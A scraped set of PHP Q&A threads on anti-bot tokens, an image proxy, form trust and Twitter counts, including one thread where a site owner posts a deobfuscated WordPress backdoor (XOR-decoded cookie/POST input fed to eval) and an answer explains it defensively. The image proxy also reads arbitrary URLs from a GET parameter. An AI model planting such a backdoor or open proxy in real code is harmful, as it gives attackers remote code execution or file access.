As proposed by Stopping Bot [SO] - PHP i've developed a anti-bot system in PHP which code can be viewed at https://codereview.stackexchange.com/questions/2362/anti-bot-comment-system-php
But anyone can obtain a token by viewing getToken.php
In SO they get the token from stackauth.com [i think so by viewing page code], but when i browsed it it just showed some text !
How can i do something like that ? [token to be passed only when requested by the code, not by the browser]
The process of generating and verifying token
in the form page
$hash=sha1($time.$myKey);
echo $time.'#'.$hash;
In the poster/verification page
$token=explode($_POST['token'],'#',2);
if (sha1($token[0].$myKey)==$token[1])
echo 'A good Human';
Edit
I do not store used token in the database, and a token get expired after [say] 5 minutes !
Think a bad user gets the token 2011-05-18 11:10:12#AhAShKey000000000 he can use the token to submit random text to 2011-05-18 11:15:12, how can i fix this issue ?
Not totally sure this is the answer you're after, but...
Load the token statically in the page, instead of with Ajax. Then you know that the form page was loaded for sure.
You can use ftok(__FILE__,'T'); - and token will be unique on each system.
Instead of T you can use any letter, read Manual.
As example, in your getToken.php you can replace:
$hash=sha1($key.'mySecretKey');
with
$hash=sha1($key.ftok(__FILE__,'T'));
This function exists only in linux/unix-based systems.
That won't stop anything, in fact it'll only add more strain on your server.
Use hashcash instead (Wordpress plugin).
Nothing is going to completely stop this kind of activity. For the 99.99999999999% case though, a method that uses a server side component plus something that uses javascript to do a transform on the the data you get back from the server is going to stop the majority of bots that are out there (unless they're based on node.js and are using jsdom ;-)).
Well, this is kind of impossible to fix. You can't see if a bot or a browser is viewing your "token page". All things you could check for are also possible to mimic. (Referrers, more hashes or user-agents)
You should ask yourself, what do you want to protect your site from? For a regular bot you methods is okay, it will take way too much time to crack your script and spam just your site. It will just go on and spam someone else. So in that cast your script will give enough protection.
When there is someone targeting just your site and he takes the time to crack it, he will probably succeed. So you also want to keep this kind of bots/people out? I would suggest to display a captcha after, for example, 3 posts within an hour from one IP-address. That will keep them out.
It's not always about being completely secure, your solution could already be good enough... If more protection is required, just use captchas or something like that.
Okay this, as is everything else, is not completely secure.
You could try creating a similar hash with javascript that carries the time and a unique ID of the user and sending that with the request.
You can then even add that to the code generation and verification.
In the absence of this hash, no code is served.
Sort of like a handshake.
After reading all the answer carefully i've developed this [thanx to all the people for their valuable comment and answer]
<?php
$time = microtime();
for ($i=1;$i<=10000;$i++)
generateMath();
echo 'Generating '.$i.' math Took '.(microtime()-$time);
function generateMath()
{
$operands = array(43,45,42);
$val = chr(rand(48,57));
$ope = chr($operands[rand(0,2)]);
$txt = $val.$ope; //42* 43+ 45- 47/
$val2 = chr(rand(48,57));
$txt .= $val2;
$ans = 0;
if ($ope == '+')
$ans = $val + $val2;
else if ($ope == '-')
$ans = $val - $val2;
else if ($ope == '*')
$ans = $val * $val2;
echo $txt.' -> '.$ans.'<br/>';
}
?>
This can be enhanced by adding random number of spaces in $txt = $val.$spaces.$ope.$spaces.$val2;
And it was faster than CAPCHA, people will have to do a really simple math if they post more than 30 or so comments in an hour !
Related
I found some code that I did not write in my public_html folder on my WordPress site. After a bit of effort, I was able to get it into a somewhat readable state, but it's still beyond me what it does. Could anyone with a better understanding tell me what this code was supposed to be doing?
If it helps, it had also overwritten my index.php file with this code, as well as had several references to a strange .ico file.
foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
function fun1($key, $valueLength)
{
$keyGuid = $key . "49d339b2-3813-478a-bfa1-1d75be92cf49";
$repeatTimes = ($valueLength / strlen($key)) + 1;
return substr(str_repeat($keyGuid, $repeatTimes), 0, $valueLength);
}
function packToHex($inputToPack)
{
return #pack("H*", $inputToPack);
}
function fun3($exploded)
{
$modCount = count($exploded) % 3;
if (!$modCount) {
eval($exploded[1]($exploded[2]));
exit();
}
}
$value = packToHex($value);
$bitwiseXor = $value ^ fun1($key, strlen($value));
$exploded = explode("#", $bitwiseXor);
fun3($exploded);
}
Short answer: It is backdoor, it allows to execute arbitrary code on the server side.
Note: all you need to see is that it has eval and takes input from the user.
What arbitrary code? Whatever they want.
Long answer:
It will take data from $_COOKIE and $_POST as you can see. This data comes from the user. We can infer that this code was designed for a malicius user recieve data (which, either the malicius user will send directly, or via a bot).
What does it dose with this data? Well, it will over all the input, one by one, and try to:
$value = packToHex($value); Interpret it as an hexadecimal string and covert it to its binary representation. Silently fail if it isn't an hexadecimal string.
$bitwiseXor = $value ^ fun1($key, strlen($value)); apply a cheap cipher over it. This is a symetric substitution cipher, it depends on $key and the hard coded guid 49d339b2-3813-478a-bfa1-1d75be92cf49. We can asume that who injected this code knows the guid and how to cipher for it (it is exactly the same code).
$exploded = explode("#", $bitwiseXor); We then separate the result by the character "#".
And fun3($exploded); interpret it as code (see [eval][1]).
If all succedes (meaning that the input from the user was such that it triggered this process), then it will exit, so that it flow of execution never reaches your code.
Now, somebody injected this code on the server. How did they do it? I do not know.
My first guess is that you have some vulnerability that allows them to upload PHP code (perhaps you have a file upload function that will happilly take PHP files and put them in a path where the user can cause the server to run them).
Of course, there are other posibilities... they may have brute forced the login to your ftp or admin login, or some other thing that would allow them to inject the code. Or you may be running some vulnerable software (an outdated or poorly configured WordPress or plugin, for example). Perhaps you downloaded and used some library or plugin that does watherver but is compromised with malware (there have been cases). or perhaps you are using the same key as your email everywhere, and it got leaked from some other vulnerable site... or, this was done by somebody who works with you and have legitimate access, or something else entirely...
What I am saying is that... sure remove that code from your server, but know that your server is vulnerable by other means, otherwise it wouldn't have got compromised in the first place. I would assume that whoever did this is out there, and may eventually notice you took it down and compromise your server again (Addendum: In fact, there could be some other code in your server that puts it back again if it is not there).
So go cover all your bases. Change your passwords (and use strong ones). Use https. Configure your server properly. Keep your software up to date.
If you have custom PHP code: Validate all input (including file uploads). Sanitize whatever you will send back to the user. Use prepared sentences. Avoid suspicius third party code, do not copy and paste without understanding (I know you can do a lot without really understanding how it works, but when it fails is when you really need the knowledge).
Addendum:
If you can, automate updates and backups.
Yes, there are security plugins for WordPress, and those can go a long way in improving its security. However, you can always configure them wrong.
I'd like a section of text that is already dynamically changing every 10 minutes to do it without refreshing the page. I was thinking something along the lines of:
<?php
while (1 < 2) {
echo $value;
sleep(60);
}
?>
I realize that's a dumb way to make a while loop run and I would think it would work with just "while(){}" but I just wanted to make sure, that will be corrected when I actually write this thing as long as this isn't terrible to do. If there is a better way I'd love to hear it! thanks!
Edit: I just noticed it would echo the value after the first, any cleaver ways to make it replace it?
Edit2 Here's the php function I already written to retrieve the changing value:
<?php
function getTotal($basePrice){
$dogeValue = file_get_contents("https://www.dogeapi.com/wow/?a=get_current_price");
$postage = .49/$dogeValue;
return round($sellAmount = $basePrice/$dogeValue - $postage - ($basePrice*0.1/$dogeValue));
}
?>
The short answer: yes, that is bad practice.
Reasons include:
You tie up your server (will probably time out)
Unless you play around with the buffering, things will not be reflected at the time you want
You never send the close tag to the browser (or anything else that happens later).
It is tricky to overwrite what was already there, so you end up with the output increasing instead of changing.
Recommendation:
Use client side code (javascript, AJAX) - don't try to do this server side.
You can see an example of periodic AJAX at https://stackoverflow.com/a/6378771/1967396 .
For periodic JavaScript, see many good answers at Is there any way to call a function periodically in JavaScript?
This script will never show you anything, because until processing the php script is not done, web server doesn't send anything to output, considering your infinite loop, it will never happen.
instead of this not-working idea, use Ajax, cron jobs, or even pure javascript, its very simple and more rational certainly.
So on my site (https://example.com) I have a page that parses the last.fm API and pulls back the images off their akamai CDN and displays them on the page.
The thing is all the images are served on HTTP ONLY, https is not supported.
e.g: http://userserve-ak.last.fm/serve/64s/76030502.png
I have an image proxy written in php:
<?php
header('Content-Type: image/png');
if(isset($_GET['img'])){echo file_get_contents($_GET['img']);}
?>
This works perfectly, however, is NOT secure at all, I want it so that only my server can use the image proxy and as such a hash in the URL might be the best option?
https://example.com/proxy.php?url=http://last.fm/image.jpg&hash=hashhere
I had thought of using:
md5($_GET['img']."privatekeyhere");
Then my problem turned to, how to I put the private key in the javascript code without the whole world having access to it?
Any help much appreciated.
I have since written this script that is somewhat effective but still open to being circumvented:
<?php
$args = $_GET['q'];
$date = date('m-d-Y-h-i', time());
list($hash,$img,$auth) = explode("/", $args);
if($hash=="need" && $auth=="key"){
$checksum = md5($img.$date);
echo $checksum;
}
if($hash==md5($img.$date))
{
header('Content-Type: image/png');
echo file_get_contents('http://userserve-ak.last.fm/serve/64s/' . $img);
}
?>
This can be called like so: https://www.mylesgray.com/lastfm/need/76030502.png/key
The auth code can then be plugged in to display the image: https://www.mylesgray.com/lastfm/{code-here}/76030502.png
However it doesn't take long for someone to figure out they can set up a script to poll for a key every minute - any advice?
Generate unique tokens. You're on the right track with a hash, but if you keep your private key constant, it'll eventually get brute-forced. From there, rainbow tables say hi.
You're effectively going to have to borrow a leaf or two from mechanisms used to prevent CSRF abuse, as you're effectively trying to do the same thing: limit the user to one query per token, with a token that cannot be regenerated by them.
There are tons of ways to do this, and the usual trade-off is between efficiency and security. The simplest is what you've suggested - which is easily brute-forceable.
At the opposite end of the spectrum is the DB approach - generate a unique token per visit, store it in a DB, and validate subsequent calls against this. It is pretty DB-intensive but works out relatively well - and is virtually impossible to break unless the token generation is weak.
what is the best way to tell my server side script that the submitted form or data is coming from a trusted source or from my website?
Am already performing alot of server side data scrutinize, and think i can improve this more with the client side too
AM a php/mysql developer
To find out the IP of the user who posted the data use:
$ip = $_SERVER['REMOTE_ADDR'];
echo "<b>IP Address= $ip</b>";
According to the IP you can decide whether the user is trusted or not. (for instance if you'd like to trust only a special range of IP-addresses)
Whenever I read posted variables in PHP I use to filter them like that:
function check_string($string) {
// allowed chars: a-z,A-Z,0-9,-,_
if((preg_match('/^[a-zA-Z0-9\-\_]+$/',$string)))
return true;
return false;
}
It would filter all chars which are not a-z, A-Z, 0-9,- or _ and enhances the sites security a little bit. If you've access to your webserver:
Disable server banners (which display OS and apache version for instance), if you have access to the webservers configuration. This information can be very useful for hackers, and you want to disable everything which could help them in any way ;)
Prevent directory listing (for instance with .htaccess files). A simple example would be:
Options All -Indexes
Run the webserver with a limited user account (best would be to chroot the user as well)
Use mysql_real_escape_string in mysql queries and use htmlentities in html posts.
Example:
Wrong:
<?php
if($_SERVER['REQUEST_METHOD'] == "post"){
echo $_POST['hai'];
}
?>
right:
<?php
if($_SERVER['REQUEST_METHOD'] == "post"){
echo htmlentities($_POST['hai']);
}
?>
$_POST can also be $_GET
wrong:
<?php
$query = "SELECT * FROM table WHERE msg = '". $_GET['hai'] ."'";
?>
right:
<?php
$query = "SELECT * FROM table WHERE msg = '". mysql_real_escape_string($_GET['hai']) ."'";
?>
And don't forget to use htmlentities when you get things out of the mysql table...
Greetings
I've always used a class that handled such issues, it would handle both server/client side and ensure that any input was made from the server itself. It would then validate and ensure it is not given special characters.
http://validformbuilder.org/
Let me know if that helps, it helped me a while ago. :)
I think the best option would be adding a digital signature to requests, even a simple one.
For example your site or the trusted source add the SHA checksum of the request computing it after the addition of a secret "salt" (that is not sent). The server gets the data, adds the same salt and computes the SHA signature, if the SHA matches then the source knew the secret and you can trust the content.
I guess your question implies CSRF... Just generate and add a validation token.
Many frameworks can manage these for you.
Guys, thanks for your help i appreciate it all. Generally i was talking about client side security ie making sure data coming from the client is from original source.
Generally SSL might just have been the answer, after a lot of browsing i found two sites that solves this issue to an extent: aSSL ,and Jquery implementation
This way my data is secured up to a level say 90%
what do you think?
This is the code I am using, but it does return blank in most cases.
<?php
$xml=file_get_contents('http://twitter.com/users/show.xml?screen_name=MyTwitterUsernameBla');
if (preg_match('/followers_count>(.*)</',$xml,$match)!=0) {
$count = $match[1];
}
echo $count;
?>
I want to show Twitter followers count in simple way, no plugins..it's a website, and not a blog.
Thank you very much :)
If it works on your localhost but not on your public host, then chances are that Twitter is either blocking or throttling your public server's IP. Many shared hosts get blocked/throttled because there are multiple sites banging away at the Twitter API without authentication. Twitter views them as one app and throttles the IP as a whole.
To get around this, you're going to need to authenticate using oAuth. It's a pain in the ass, but it's a necessary step. Here are some resources that you might find to be handy:
http://blog.evandavey.com/2010/02/how-to-php-oauth-twitter.html
http://pear.php.net/package/HTTP_OAuth/redirected
Twitter offers you some credentials in the "Your Apps" section of the Twitter Developer website. Once you've registered your site as an app, click on My Access Token. That will give you a key/token that you can use to successfully authenticate.
Another thought is that Twitter is simply throttling your app. If this is the case, it's because you've got too much traffic and you're not caching the API results. Cache the results of the API for, say, an hour before fetching a new copy. Twitter will stop singling you out if you do this.
if(filemtime("cache.xml") < (int)$_SERVER["REQUEST_TIME"] - 3600) {
$data = file_get_contents("http://twitter.com/users/show.xml?screen_name=username");
file_put_contents("cache.xml", $data);
} else
$data = file_get_contents("cache.xml");
Think your reg. exp. is too greedy.. believe it will match everything up until the last '< /'
try something like a non-greedy match:
/followers_count>(.*?)</
or match everything except '<' :
/followers_count>([^<]*)</
Parsing the XML might be easier, and if you want to extract a lot from the xml, more "correct". But seems like overkill in your case.
It's much better (more reliable and easier to maintain) to use an XML parser than to try to fetch bits with regular expressions.
Simply:
$xml = new SimpleXMLElement('http://twitter.com/users/show.xml?screen_name=username', null, true);
echo $xml->followers_count;